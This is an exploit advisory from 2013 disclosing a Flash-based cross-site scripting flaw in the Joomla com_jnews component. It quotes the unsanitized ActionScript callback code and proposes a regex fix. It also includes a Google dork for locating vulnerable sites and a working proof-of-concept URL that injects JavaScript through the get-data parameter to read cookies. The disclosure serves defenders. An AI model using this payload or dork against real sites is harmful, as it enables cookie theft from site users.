# Exploit Title: Joomla com_jnews Open Flash-Chart XSS
# Release Date: 14/05/2013
# Author: Deepankar Arora And Rafay Baloch
# Blog: http://rafayhackingarticles.net
# Vendor: www.joobi.co
# Versions Affected: 8.0.1(latest) and earlier
# Google Dork: inurl:com_jnews
Description:
The vulnerability in Open Flash Chart is already known; however, the component is bundled with com_jnews, and its get-data parameter is not sanitized.
As a result, it leads to Flash-based cross-site scripting.
The vulnerable code is as follows:
    // default name of the JavaScript callback the chart invokes
    var _local2 = "open_flash_chart_data";
    var _local3;
    if (this.chart_parameters["get-data"]) {
        // attacker-controllable value copied verbatim, no sanitization
        _local2 = this.chart_parameters["get-data"];
    }
    if (this.chart_parameters["id"]) {
        _local3 = this.callExternalCallback(_local2, this.chart_parameters["id"]);
    } else {
        _local3 = this.callExternalCallback(_local2);
    }
The code shows that, when the chart loads, the get-data parameter is copied straight into _local2 and
handed to the external callback without any sanitization.
POC:
http://localhost/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()
Fix:
Sanitize the input, for example:
    _local2 = (this.chart_parameters["get-data"]).toString().replace(/[^\w]/g, '');
This strips every character other than letters, digits and underscores, so the value can only ever be a plain callback name.
References:
http://www.wooyun.org/bugs/wooyun-2010-07265